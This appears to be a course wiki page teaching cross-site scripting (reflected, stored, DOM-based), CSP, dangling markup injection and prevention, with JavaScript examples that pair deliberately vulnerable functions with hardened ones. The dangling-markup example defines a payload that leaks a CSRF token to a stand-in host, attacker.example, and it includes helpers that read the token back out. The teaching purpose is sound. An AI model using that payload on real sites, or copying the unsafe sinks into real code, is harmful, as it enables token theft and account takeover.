Read 36 401 - jserpa-p/lisbon-ops-301n1_Reading GitHub Wiki

XSS with w3af, DVWA

Cross-site scripting

Cross-site scripting (XSS) is a type of security vulnerability that occurs when a website or web application doesn't properly validate or sanitize user input before displaying it to other users. This allows attackers to inject malicious scripts into web pages that are viewed by unsuspecting users.

In simpler terms, XSS happens when a website doesn't check the content that users input, and attackers can use this vulnerability to insert harmful code that affects other users visiting the site.

What are the types of XSS attacks?

  • Reflected XSS, where the malicious script comes from the current HTTP request.
  • Stored XSS, where the malicious script comes from the website's database.
  • DOM-based XSS, where the vulnerability exists in client-side code rather than server-side code.

Stored XSS vs Reflected XSS

Reflected Cross-Site Scripting (XSS) happens when the payload is supplied in the current request (typically a URL parameter or form field) and the server echoes it straight back into the response. The victim has to be induced to send that request, usually by following a crafted link, and the script runs once, in that victim's browser.

Stored Cross-Site Scripting (XSS) occurs when the payload is saved on the server (a comment, a profile field, a support ticket) and then included in pages served to other users. Every user who views the stored data is attacked, without having to click anything.

Both types of XSS attacks can lead to unauthorized actions or theft of information. Preventing them comes down to the same control: treat every piece of user-supplied data as untrusted and encode it for the context it is placed in when it is written out.

DOM-based cross-site scripting

DOM-based XSS arises when an application contains some client-side JavaScript that processes data from an untrusted source in an unsafe way, usually by writing the data back to the DOM.
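The source-to-sink flow described above, as an added example that is not part of the original page. The page reads a display name from the URL fragment; the vulnerable version hands it to innerHTML, the safe version to textContent. The FakeElement class is an assumption that stands in for a real DOM element so the code runs under Node; in a browser you would call greetSafe(document.getElementById('out'), location.hash).

```javascript
'use strict';

// Source: the URL fragment, e.g. https://app.example/#name=Alice
function nameFromFragment(hash) {
  const params = new URLSearchParams(String(hash).replace(/^#/, ''));
  return params.get('name') ?? '';
}

// Vulnerable: untrusted data is concatenated into markup and handed to
// innerHTML, which parses it. innerHTML does not execute <script> elements it
// inserts, so the usual payload is an element with an event handler such as
// <img src=x onerror=...>, which fires as soon as the image fails to load.
function greetUnsafe(el, hash) {
  el.innerHTML = '<p>Welcome, ' + nameFromFragment(hash) + '</p>';
}

// Safe: the same data written through textContent is treated as text only,
// whatever characters it contains.
function greetSafe(el, hash) {
  el.textContent = 'Welcome, ' + nameFromFragment(hash);
}

// Stand-in for a DOM element so this runs under Node (an assumption, not the
// real DOM). Its innerHTML setter only models on*= attributes; a real parser
// handles far more constructs (srcdoc, object data, ...), so treat it as a sketch.
class FakeElement {
  constructor() { this.html = ''; this.fired = []; }
  set innerHTML(markup) {
    this.html = markup;
    for (const m of markup.matchAll(/\son[a-z]+\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))/gi)) {
      this.fired.push(m[1] ?? m[2] ?? m[3]);   // handler body the browser would run
    }
  }
  get innerHTML() { return this.html; }
  set textContent(text) {
    // Serialising text back out shows it as escaped markup, as a browser would.
    this.html = String(text).replace(/[&<>]/g, c => ({ '&': '&amp;', '<': '&lt;', '>': '&gt;' }[c]));
  }
}
```

The fix is not to filter the fragment but to choose a sink that cannot interpret markup. Where HTML really has to be built on the client, use the DOM APIs (createElement, setAttribute) or a template engine that encodes for the context, rather than string concatenation into innerHTML.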

What can XSS be used for?

  1. Impersonate or masquerade as the victim user.
  2. Carry out any action that the user is able to perform.
  3. Read any data that the user is able to access.
  4. Capture the user's login credentials.
  5. Perform virtual defacement of the web site.
  6. Inject trojan functionality into the web site.

Content security policy

Content security policy (CSP) is a browser mechanism that aims to mitigate the impact of cross-site scripting and some other vulnerabilities. The server sends a Content-Security-Policy response header listing the sources from which scripts and other resources may be loaded; a browser that honours it refuses to run injected inline script or script from an origin the policy does not allow. CSP is a second line of defence behind output encoding, not a replacement for it.

Dangling markup injection

Dangling markup injection is a technique that can be used to capture data cross-domain in situations where a full cross-site scripting exploit is not possible, due to input filters or other defenses. It can often be exploited to capture sensitive information that is visible to other users, including CSRF tokens that can be used to perform unauthorized actions on behalf of the user.
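A simulation of that capture, added here as an example that is not part of the original page or of w3af or DVWA. The profile page, the filter, the attacker host attacker.example, the token value and the function that stands in for the browser's attribute tokenizer are all assumptions; the point it shows is how an unterminated quoted attribute swallows the markup that follows it, CSRF token included.

```javascript
'use strict';

// A filter of the kind that pushes attackers toward dangling markup: it strips
// <script> blocks and on*= handlers but leaves every other tag and quote alone.
function naiveFilter(input) {
  return String(input)
    .replace(/<script[\s\S]*?<\/script>/gi, '')
    .replace(/\son\w+\s*=\s*("[^"]*"|'[^']*'|[^\s>]+)/gi, '');
}

// Profile page: the display name is echoed near the top, a CSRF token sits in a
// form further down, and a later element uses single-quoted attributes.
function renderProfile(nameHtml, csrfToken) {
  return `<h1>Hi ${nameHtml}</h1>\n` +
         `<form action="/email" method="POST">\n` +
         `<input type="hidden" name="csrf" value="${csrfToken}">\n` +
         `<input type="text" name="email" value="alice@example.org">\n` +
         `</form>\n` +
         `<a href='/settings'>Settings</a>`;
}
function profilePageFiltered(displayName, csrfToken) {
  return renderProfile(naiveFilter(displayName), csrfToken);
}

// Hardened version: encode for the HTML element context, so no tag can start
// and no quote can be left dangling.
function encodeForHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(s).replace(/[&<>"']/g, c => map[c]);
}
function profilePageSafe(displayName, csrfToken) {
  return renderProfile(encodeForHtml(displayName), csrfToken);
}

// Attacker payload: an <img> whose src is opened with a single quote and never
// closed. The attribute value runs on until the next single quote in the page.
const PAYLOAD = "<img src='https://attacker.example/log?";

// Stand-in for the browser's tokenizer on a quoted attribute value: everything
// up to the matching quote, tags and newlines included, becomes the value, and
// the browser then requests that string as the image URL.
function imgSrcRequested(html) {
  const m = /<img\s[^>]*?src\s*=\s*'([^']*)'/i.exec(html);
  return m ? m[1] : null;
}

// What the attacker reads out of their access log.
function tokenInLeakedUrl(url) {
  const m = /name="csrf" value="([^"]*)"/.exec(url ?? '');
  return m ? m[1] : null;
}
```

Two caveats a tester should keep in mind. First, this stand-in does not model the mitigation in Chromium-based browsers, which refuse to fetch a subresource whose URL contains a raw newline or `<` character precisely to blunt this technique, so the capture may need a different vehicle there. Second, the fix is the same as for ordinary XSS: the filtered page fails because it filters, the safe page succeeds because it encodes for the output context.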

How to prevent XSS attacks

  1. Filter input on arrival
  2. Encode data on output
  3. Use appropriate response headers
  4. Content Security Policy
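The four steps applied to the two server-side cases from earlier on this page, reflected (a search term echoed from the request) and stored (comments kept in a database), as an added example that is not part of the original page or of DVWA. The handlers, the in-memory comment array standing in for the database, the validation rules and the header values are assumptions; each page is shown in its vulnerable form beside the hardened one.

```javascript
'use strict';

// Step 2: context-aware output encoders. Each neutralises the characters that
// could terminate the context the untrusted data is placed into.
const HTML_ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
function encodeForHtml(s) {
  return String(s).replace(/[&<>"']/g, c => HTML_ESCAPES[c]);
}
// For data landing inside a JavaScript string literal: \u-escape everything
// outside a small safe alphabet, so quotes and </script> cannot break out.
function encodeForJsString(s) {
  return String(s).replace(/[^A-Za-z0-9 ]/g,
    c => '\\u' + c.charCodeAt(0).toString(16).padStart(4, '0'));
}

// Steps 3 and 4: response headers. The CSP forbids inline script, so a payload
// that slipped past encoding would still not run in a CSP-aware browser.
const SECURITY_HEADERS = {
  'Content-Type': 'text/html; charset=utf-8',
  'X-Content-Type-Options': 'nosniff',
  'Content-Security-Policy': "default-src 'self'; script-src 'self'; object-src 'none'; base-uri 'none'",
};

// Step 1: validate on arrival. Reject what cannot be legitimate instead of
// stripping "dangerous" substrings, which filters tend to miss.
function validateQuery(q) {
  return (typeof q === 'string' && q.length <= 100) ? q : null;
}

// Reflected: the search term comes from the request and goes straight back
// into the response. Vulnerable version first.
function searchPageUnsafe(q) {
  return { status: 200, headers: { 'Content-Type': 'text/html' },
           body: `<h1>Results for ${q}</h1><input name="q" value="${q}">` };
}
function searchPage(q) {
  const query = validateQuery(q);
  if (query === null) return { status: 400, headers: SECURITY_HEADERS, body: '<p>Bad request</p>' };
  const safe = encodeForHtml(query);   // one encoder covers element body and double-quoted attribute
  return { status: 200, headers: SECURITY_HEADERS,
           body: `<h1>Results for ${safe}</h1><input name="q" value="${safe}">` };
}

// Stored: comments persist server-side (the array stands in for the database)
// and are rendered for every later visitor.
const comments = [];
function postComment(author, text) {
  if (!/^[A-Za-z0-9_]{1,32}$/.test(author)) throw new Error('invalid author');   // allowlist
  if (typeof text !== 'string' || text.length > 500) throw new Error('invalid text');
  comments.push({ author, text });   // stored as submitted; encoded at output time
}
function commentsPageUnsafe() {
  return comments.map(c => `<li>${c.author}: ${c.text}</li>`).join('');
}
function commentsPage() {
  return comments.map(c => `<li>${encodeForHtml(c.author)}: ${encodeForHtml(c.text)}</li>`).join('');
}
```

Note that the stored data is kept exactly as submitted and encoded only when rendered: encoding on input ties the stored value to one output context, and the same comment may later be emitted into HTML, into a JSON API or into a JavaScript string, each needing a different encoder.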

Questions

Explain how a cross-site scripting attack works in non-technical terms.

In simple terms, an XSS attack happens when someone submits harmful code to a website, for example in a comment box, and the site shows that code to other visitors as if it were part of the page. Their browsers run it without anyone noticing, which lets the attacker act as those visitors or steal what they can see.

What are the three types of XSS attacks?

Stored XSS, Reflected XSS & DOM XSS

If an attacker successfully exploits a XSS vulnerability, what malicious actions would they be able to perform?

Impersonate or masquerade as the victim user, carry out any action that the user is able to perform, read any data that the user is able to access, capture the user's login credentials, perform virtual defacement of the web site, inject trojan functionality into the web site.

What are some security controls that can be implemented to prevent XSS attacks?

Filter input on arrival, encode data on output, use appropriate response headers, Content Security Policy.